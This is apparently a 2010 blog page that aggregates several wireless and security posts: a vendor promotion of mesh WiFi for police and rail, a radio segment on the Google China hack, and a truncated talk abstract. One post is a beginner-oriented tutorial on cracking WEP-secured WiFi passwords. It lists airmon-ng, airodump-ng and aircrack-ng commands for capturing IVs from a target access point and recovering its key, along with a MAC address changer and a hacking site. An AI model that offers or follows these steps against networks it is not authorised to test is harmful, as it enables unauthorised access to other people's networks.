WiFi for Police, Fire, Railway, Homeland Security

Sunday, February 14th, 2010

Mission critical Wireless Mesh Networks are enabling public safety and other state, local and federal government agencies witht he ability … all ยป to access timely and critical information using broadband wifi networks that cover entire municipalities. Today, these networks are used by police, fire and emergency services agencies for wireless video surveillance and complex GIS applications and more. In some cases, but not all, municipalities are enabling public Internet access. While video surveillance and public internet access is interesting, new cellular/wifi dual mode phones as well as distributed and shared applications will drive the adoption of these networks. Even better, the highest performance wifi mesh capabilities are available on high-speed commuter rail lines. Strix Systems delivers the highest throughput, lowest latency wifi Mesh products to enable voice, video and data applications – even at high speeds.

How To Hack Wireless Networks (WEP – Windows/Linux) – Part 2

Monday, February 1st, 2010

This is very easy(Noob-Friendly) yet detailed tutorial on how to hack WEP-Secured wireless network passwords. This video shows how to do it on a Windows OS(XP, Vista, 7) or a Linux OS. There are two reasons why I used a virtual OS rather then running the cracking tool locally in a Windows environment; 1 – I want this tutorial to assist not only Windows-Users but also Linux-Users and 2 – Compatibility issues are very common with airmon-ng when using in the Windows Environment and will not only limit the amount of people who are able to do it but also complicate the procedure for beginners. – Commands Used: airmon-ng (Shows connected network adapters/devices) airodump-ng wlan0 (Shows available networks on the wlan0 network adapter – Your network adapter name may differ) airodump-ng -w passcode –bssid 00:18:39:7C:3F:D6 -C 6 wlan0 (Writes intercepted/sniffed iv’s to a CAP document called passcode. The bssid specifies the Mac Address of the Access Point you are wanting to crack so the Mac Address should differ from what I use. The Channel may also differ depending on what’s displayed for you. Same goes for the network adapter) dir (Shows files in the current directory) aircrack-ng -a 1 -b 00:18:39:7C:3F:D6 FILENAME.cab (Cracks the iv’s in the Cab file created via the airodump-ng command. The Mac Address specified should be that of the Access Point your trying to crack) – Download Links: Mac Address Changer (Not Install required) www.t3hunderground.com vmware Player: www.vmware.com backtrack vmware or CD Image (ISO): www.backtrack-linux.org

Web security – Tech review with Peter Marks

Friday, January 29th, 2010

www.abc.net.au There’s a fair bit of low-level warfare happening out there in cyberspace. This week, Google continues to investigate a serious hack of its own network, and the email of some of its users. The fall-out may mean that Google departs from China, turning away from the potential to make billions from one of the fastest growing internet markets. How did we come to this, and can we trust our mail to online services? And from Europe comes the news that the German and French governments have called on their citizens to abandon using the Internet Explorer browser in order to improve security.

have seen a diversity of wireless communication systems that coexist and extend the coverage of wireless access to the Internet. The main wireless access networks include 3G, WLAN, and WMN (wireless mesh networks). The coexistence of these various technologies provides users with multiple choices with different features and advantages. It also brings new opportunities and challenges in providing seamless wireless communication service for Internet access. In this talk, I will introduce …
